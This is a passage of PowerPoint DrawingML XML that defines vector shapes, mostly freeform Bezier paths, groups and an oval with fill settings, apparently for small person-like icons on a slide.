                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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72549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7" name="Freeform 854">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2337290-09E6-47DE-BAB6-503ECEFC7EE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158" y="1323"/>
                  <a:ext cx="419" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119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72549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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="bg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8" name="Freeform 855">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101E2E66-569E-4A0E-A6C1-FB22D1B1FF5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252" y="1304"/>
                  <a:ext cx="109" cy="69"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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9" name="Oval 856">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A390846-9EC4-4290-8B3D-958B3670A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flipH="1">
                  <a:off x="2239" y="1204"/>
                  <a:ext cx="145" cy="145"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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84" name="Group 2083">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE3A978-18AB-4229-8408-6EEC8847A5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32038" y="2358427"/>
              <a:ext cx="414338" cy="557213"/>
              <a:chOff x="1784" y="2648"/>
              <a:chExt cx="527" cy="707"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="693" name="Group 2084">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F9FB7F-36FE-4DF6-B2D9-77EDAEEFBF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8" y="2648"/>
                <a:ext cx="313" cy="629"/>
                <a:chOff x="1155" y="1032"/>
                <a:chExt cx="313" cy="629"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="707" name="Freeform 2085">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3994381B-1BB7-43FA-B6C7-1D19D058072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297" y="1336"/>
                  <a:ext cx="120" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 89 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 2 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 43 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 43 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="89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  <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="2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8"/>
                        <a:pt x="43" y="225"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207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08" name="Freeform 2086">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718B4A6C-FE47-49F4-946B-3168EC137A6D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1155" y="1118"/>
                  <a:ext cx="313" cy="258"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 236"/>
                    <a:gd name="T1" fmla="*/ 114 h 194"/>
                    <a:gd name="T2" fmla="*/ 235 w 236"/>
                    <a:gd name="T3" fmla="*/ 114 h 194"/>
                    <a:gd name="T4" fmla="*/ 225 w 236"/>
                    <a:gd name="T5" fmla="*/ 49 h 194"/>
                    <a:gd name="T6" fmla="*/ 199 w 236"/>
                    <a:gd name="T7" fmla="*/ 24 h 194"/>
                    <a:gd name="T8" fmla="*/ 156 w 236"/>
                    <a:gd name="T9" fmla="*/ 13 h 194"/>
                    <a:gd name="T10" fmla="*/ 116 w 236"/>
                    <a:gd name="T11" fmla="*/ 2 h 194"/>
                    <a:gd name="T12" fmla="*/ 86 w 236"/>
                    <a:gd name="T13" fmla="*/ 12 h 194"/>
                    <a:gd name="T14" fmla="*/ 73 w 236"/>
                    <a:gd name="T15" fmla="*/ 86 h 194"/>
                    <a:gd name="T16" fmla="*/ 73 w 236"/>
                    <a:gd name="T17" fmla="*/ 86 h 194"/>
                    <a:gd name="T18" fmla="*/ 72 w 236"/>
                    <a:gd name="T19" fmla="*/ 91 h 194"/>
                    <a:gd name="T20" fmla="*/ 21 w 236"/>
                    <a:gd name="T21" fmla="*/ 104 h 194"/>
                    <a:gd name="T22" fmla="*/ 26 w 236"/>
                    <a:gd name="T23" fmla="*/ 135 h 194"/>
                    <a:gd name="T24" fmla="*/ 80 w 236"/>
                    <a:gd name="T25" fmla="*/ 122 h 194"/>
                    <a:gd name="T26" fmla="*/ 80 w 236"/>
                    <a:gd name="T27" fmla="*/ 122 h 194"/>
                    <a:gd name="T28" fmla="*/ 86 w 236"/>
                    <a:gd name="T29" fmla="*/ 120 h 194"/>
                    <a:gd name="T30" fmla="*/ 99 w 236"/>
                    <a:gd name="T31" fmla="*/ 112 h 194"/>
                    <a:gd name="T32" fmla="*/ 104 w 236"/>
                    <a:gd name="T33" fmla="*/ 92 h 194"/>
                    <a:gd name="T34" fmla="*/ 104 w 236"/>
                    <a:gd name="T35" fmla="*/ 92 h 194"/>
                    <a:gd name="T36" fmla="*/ 110 w 236"/>
                    <a:gd name="T37" fmla="*/ 47 h 194"/>
                    <a:gd name="T38" fmla="*/ 109 w 236"/>
                    <a:gd name="T39" fmla="*/ 167 h 194"/>
                    <a:gd name="T40" fmla="*/ 118 w 236"/>
                    <a:gd name="T41" fmla="*/ 178 h 194"/>
                    <a:gd name="T42" fmla="*/ 169 w 236"/>
                    <a:gd name="T43" fmla="*/ 192 h 194"/>
                    <a:gd name="T44" fmla="*/ 196 w 236"/>
                    <a:gd name="T45" fmla="*/ 173 h 194"/>
                    <a:gd name="T46" fmla="*/ 196 w 236"/>
                    <a:gd name="T47" fmla="*/ 160 h 194"/>
                    <a:gd name="T48" fmla="*/ 216 w 236"/>
                    <a:gd name="T49" fmla="*/ 155 h 194"/>
                    <a:gd name="T50" fmla="*/ 219 w 236"/>
                    <a:gd name="T51" fmla="*/ 154 h 194"/>
                    <a:gd name="T52" fmla="*/ 232 w 236"/>
                    <a:gd name="T53" fmla="*/ 146 h 194"/>
                    <a:gd name="T54" fmla="*/ 236 w 236"/>
                    <a:gd name="T55" fmla="*/ 124 h 194"/>
                    <a:gd name="T56" fmla="*/ 235 w 236"/>
                    <a:gd name="T57" fmla="*/ 114 h 194"/>
                    <a:gd name="T58" fmla="*/ 192 w 236"/>
                    <a:gd name="T59" fmla="*/ 75 h 194"/>
                    <a:gd name="T60" fmla="*/ 194 w 236"/>
                    <a:gd name="T61" fmla="*/ 88 h 194"/>
                    <a:gd name="T62" fmla="*/ 200 w 236"/>
                    <a:gd name="T63" fmla="*/ 123 h 194"/>
                    <a:gd name="T64" fmla="*/ 196 w 236"/>
                    <a:gd name="T65" fmla="*/ 124 h 194"/>
                    <a:gd name="T66" fmla="*/ 194 w 236"/>
                    <a:gd name="T67" fmla="*/ 88 h 194"/>
                    <a:gd name="T68" fmla="*/ 192 w 236"/>
                    <a:gd name="T69" fmla="*/ 75 h 194"/>
                    <a:gd name="T70" fmla="*/ 192 w 236"/>
                    <a:gd name="T71" fmla="*/ 71 h 194"/>
                    <a:gd name="T72" fmla="*/ 192 w 236"/>
                    <a:gd name="T73" fmla="*/ 75 h 1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6" h="194">
                      <a:moveTo>
                        <a:pt x="235" y="114"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="85"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="32"/>
                        <a:pt x="207" y="27"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="89" y="4"/>
                        <a:pt x="86" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="28" y="103"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="109"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="65"/>
                        <a:pt x="110" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="125"/>
                        <a:pt x="109" y="167"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="172"/>
                        <a:pt x="112" y="177"/>
                        <a:pt x="118" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="180"/>
                        <a:pt x="162" y="190"/>
                        <a:pt x="169" y="192"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="194"/>
                        <a:pt x="193" y="184"/>
                        <a:pt x="196" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="171"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="208" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="155"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="142"/>
                        <a:pt x="236" y="135"/>
                        <a:pt x="236" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="114"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="192" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="97"/>
                        <a:pt x="197" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="123"/>
                        <a:pt x="197" y="124"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="192" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="7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50000">
                      <a:schemeClr val="bg1">
                        <a:gamma/>
                        <a:shade val="85882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09" name="Freeform 2087">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E842D6C-2A9C-4C24-A328-D10EC6E7BED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312" y="1102"/>
                  <a:ext cx="87" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
